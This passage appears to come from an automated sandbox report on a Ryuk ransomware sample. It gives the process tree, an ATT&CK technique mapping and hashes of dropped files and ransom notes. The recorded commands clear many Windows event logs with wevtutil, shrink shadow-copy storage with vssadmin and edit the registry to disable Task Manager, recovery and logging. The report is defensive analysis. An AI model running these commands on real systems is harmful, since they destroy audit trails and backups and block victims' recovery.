C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"
3⤵
PID:2416

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"
3⤵
- Clears Windows event logs
PID:2388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"
3⤵
PID:992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WFP/Analytic"
3⤵
- Clears Windows event logs
PID:324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WFP/Operational"
3⤵
PID:1424

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"
3⤵
PID:1836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"
3⤵
PID:2520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"
3⤵
PID:2572

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"
3⤵
PID:1824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"
3⤵
PID:564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"
3⤵
PID:384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"
3⤵
PID:2556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"
3⤵
PID:2608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"
3⤵
PID:2600

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"
3⤵
PID:2580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"
3⤵
PID:2624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"
3⤵
PID:2640

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"
3⤵
PID:2656

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"
3⤵
- Clears Windows event logs
PID:2692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"
3⤵
PID:2708

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WUSA/Debug"
3⤵
PID:2728

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"
3⤵
- Clears Windows event logs
PID:2748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"
3⤵
PID:2772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"
3⤵
PID:2804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"
3⤵
- Clears Windows event logs
PID:2788

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"
3⤵
- Clears Windows event logs
PID:2792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"
3⤵
PID:2832

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"
3⤵
PID:2888

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"
3⤵
PID:2904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Power"
3⤵
PID:2920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Render"
3⤵
PID:2936

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"
3⤵
PID:2940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"
3⤵
PID:2956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"
3⤵
- Clears Windows event logs
PID:2972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"
3⤵
- Clears Windows event logs
PID:2988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"
3⤵
PID:3016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"
3⤵
- Clears Windows event logs
PID:1792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Debug"
3⤵
PID:2156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Operational"
3⤵
PID:3048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"
3⤵
PID:1060

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"
3⤵
PID:952

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"
3⤵
PID:3032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"
3⤵
PID:1860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"
3⤵
PID:2276

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"
3⤵
PID:2188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"
3⤵
PID:980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"
3⤵
PID:2220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"
3⤵
PID:2176

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"
3⤵
PID:2208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"
3⤵
PID:2292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"
3⤵
PID:2216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"
3⤵
PID:2324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"
3⤵
- Clears Windows event logs
PID:2336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"
3⤵
PID:620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"
3⤵
PID:2420

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"
3⤵
PID:2432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"
3⤵
PID:2456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"
3⤵
PID:2492

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"
3⤵
PID:1612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"
3⤵
PID:1924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"
3⤵
PID:588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"
3⤵
PID:2568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"
3⤵
PID:2508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"
3⤵
PID:584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ntshrui"
3⤵
PID:1728

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"
3⤵
PID:360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"
3⤵
PID:2560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "OAlerts"
3⤵
PID:2620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Security"
3⤵
PID:2636

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Setup"
3⤵
PID:2652

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "System"
3⤵
PID:2672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "TabletPC_InputPanel_Channel"
3⤵
PID:2684

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"
3⤵
PID:2704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"
3⤵
PID:2724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"
3⤵
PID:2744

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WMPSetup"
3⤵
- Clears Windows event logs
PID:2768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WMPSyncEngine"
3⤵
PID:2824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Windows PowerShell"
3⤵
PID:2808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"
3⤵
- Clears Windows event logs
PID:2752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "muxencode"
3⤵
PID:2828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
2⤵
PID:2848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
2⤵
PID:2816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
2⤵
PID:2844

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
3⤵
PID:2840

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
1⤵
PID:832

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1580

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0xc8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:960

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\RyukReadMe.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:564

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\system32\net.exe
net stop NetBackup BMR MTFTP Service /y
2⤵
PID:188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
3⤵
PID:1464

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:984

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\RyukReadMe.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:1060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1672

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef60f4f50,0x7fef60f4f60,0x7fef60f4f70
2⤵
PID:1556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1100 /prefetch:2
2⤵
PID:980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1408 /prefetch:8
2⤵
PID:916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1712 /prefetch:8
2⤵
PID:208

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2000 /prefetch:1
2⤵
PID:684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2104 /prefetch:1
2⤵
PID:568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
2⤵
PID:2752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3020 /prefetch:2
2⤵
PID:1964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2780 /prefetch:1
2⤵
PID:2240

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3444 /prefetch:8
2⤵
PID:2388

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3612 /prefetch:8
2⤵
PID:2380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3744 /prefetch:8
2⤵
PID:3024

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3712 /prefetch:8
2⤵
PID:3032

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3728 /prefetch:8
2⤵
PID:2176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3748 /prefetch:8
2⤵
PID:2148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:1
2⤵
PID:2452

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe" --reenable-autoupdates --system-level
2⤵
PID:2912

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x13c,0x140,0x144,0x110,0x148,0x13ff4a890,0x13ff4a8a0,0x13ff4a8b0
3⤵
PID:2928

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
1⤵
- Interacts with shadow copies
PID:2148

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2300

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2336

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2372

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2408

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2480

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2552

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
1⤵
PID:2776

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
1⤵
PID:2820

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
1⤵
PID:2904

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
1⤵
PID:2936

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
1⤵
PID:3032

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
1⤵
PID:2268

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
1⤵
PID:2316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe el
1⤵
PID:2300

C:\Windows\system32\wevtutil.exe
wevtutil.exe el
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2292

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Indicator Removal on Host

T1070

File Deletion

T1107

File Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\RYUKID
Filesize
8B

MD5
e493e117c57393d72febb5575ec7fb06

SHA1
69bab9b379a0b7a007b07b2d1a0fe93cf2662e28

SHA256
48f72717e4275a3f80dfd725d6db0b0366f1ae2ae61baa8d1882ae6117938b85

SHA512
228dbb3cdef8b906554a51128acf87db777869fa30324c3f5e56d9230176b304fbb3560cc35246ea0c3708438662d9886b116beeb9f54e5c03756b2d00a57c2c

Download Submit
C:\ProgramData\RyukReadMe.txt
Filesize
1KB

MD5
3cfd6ef3b2825aa6ce421e10604ff452

SHA1
7c7c75df4105d3b0d69d1e03220f4d24644a8bde

SHA256
65adfc7e8a2bf62ec815a0aded844c1f0812576d655e523201b02ca5ffe3313d

SHA512
d6c130f880ae02ff9f1d08e4b8c825d42f0ea640bd74faf16841a13438976b5e41b94d6260da1622848c3197ad25f446064fd60264b62d992b87c780dbb693fc

Download Submit
C:\ProgramData\hrmlog1
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
4bb223dbe5df0e996ceaa51a63796432

SHA1
76c0682d79c79ae714e9163a872d194fe5fd1a15

SHA256
675500c11b1d08a862a7d6ac6faed972365641f263dbc1126efe52c28a23abb8

SHA512
65153752fa0e6aeb6889dee792e0fd01e87d1903d61e4d8e80a643c8a1507ee0e4228b890e7e994ccb9c2503ccb9877a219213bc38048271a3c17425c2d8fe11

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
b7eaaa79506c974044170955cd107a41

SHA1
52c376a5e7b765f2406af179bf977f66d49f958d

SHA256
eb3729f6a660f3c84031db0bb3c93ac9069c635de31f7c8d91e019862c7c5661

SHA512
3283d31e86284b2a70e815e7dcc2de78d96492e01ac022572a3fb76399a5e5a156d1b2134fcbcd4798edacbc49fed42f4a51e43ea385b31116da7492ec02a4f9

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
b7eaaa79506c974044170955cd107a41

SHA1
52c376a5e7b765f2406af179bf977f66d49f958d

SHA256
eb3729f6a660f3c84031db0bb3c93ac9069c635de31f7c8d91e019862c7c5661

SHA512
3283d31e86284b2a70e815e7dcc2de78d96492e01ac022572a3fb76399a5e5a156d1b2134fcbcd4798edacbc49fed42f4a51e43ea385b31116da7492ec02a4f9

Download Submit
C:\ProgramData\ryuk.exe
Filesize
885KB

MD5
35194c73ff38dd6c3bed7c0efcff6826

SHA1
1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1

SHA256
5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae

SHA512
cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

Download Submit
C:\RyukReadMe.txt
Filesize
1KB

MD5
3cfd6ef3b2825aa6ce421e10604ff452

SHA1
7c7c75df4105d3b0d69d1e03220f4d24644a8bde

SHA256
65adfc7e8a2bf62ec815a0aded844c1f0812576d655e523201b02ca5ffe3313d

SHA512
d6c130f880ae02ff9f1d08e4b8c825d42f0ea640bd74faf16841a13438976b5e41b94d6260da1622848c3197ad25f446064fd60264b62d992b87c780dbb693fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID
Filesize
8B

MD5
e493e117c57393d72febb5575ec7fb06

SHA1
69bab9b379a0b7a007b07b2d1a0fe93cf2662e28

SHA256
48f72717e4275a3f80dfd725d6db0b0366f1ae2ae61baa8d1882ae6117938b85

SHA512
228dbb3cdef8b906554a51128acf87db777869fa30324c3f5e56d9230176b304fbb3560cc35246ea0c3708438662d9886b116beeb9f54e5c03756b2d00a57c2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1
Filesize
2KB

MD5
4bb223dbe5df0e996ceaa51a63796432

SHA1
76c0682d79c79ae714e9163a872d194fe5fd1a15

SHA256
675500c11b1d08a862a7d6ac6faed972365641f263dbc1126efe52c28a23abb8

SHA512
65153752fa0e6aeb6889dee792e0fd01e87d1903d61e4d8e80a643c8a1507ee0e4228b890e7e994ccb9c2503ccb9877a219213bc38048271a3c17425c2d8fe11

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2
Filesize
292B

MD5
b7eaaa79506c974044170955cd107a41

SHA1
52c376a5e7b765f2406af179bf977f66d49f958d

SHA256
eb3729f6a660f3c84031db0bb3c93ac9069c635de31f7c8d91e019862c7c5661

SHA512
3283d31e86284b2a70e815e7dcc2de78d96492e01ac022572a3fb76399a5e5a156d1b2134fcbcd4798edacbc49fed42f4a51e43ea385b31116da7492ec02a4f9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
Filesize
885KB

MD5
35194c73ff38dd6c3bed7c0efcff6826

SHA1
1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1

SHA256
5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae

SHA512
cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

Download Submit
C:\Users\Admin\RyukReadMe.txt
Filesize
1KB

MD5
3cfd6ef3b2825aa6ce421e10604ff452

SHA1
7c7c75df4105d3b0d69d1e03220f4d24644a8bde

SHA256
65adfc7e8a2bf62ec815a0aded844c1f0812576d655e523201b02ca5ffe3313d

SHA512
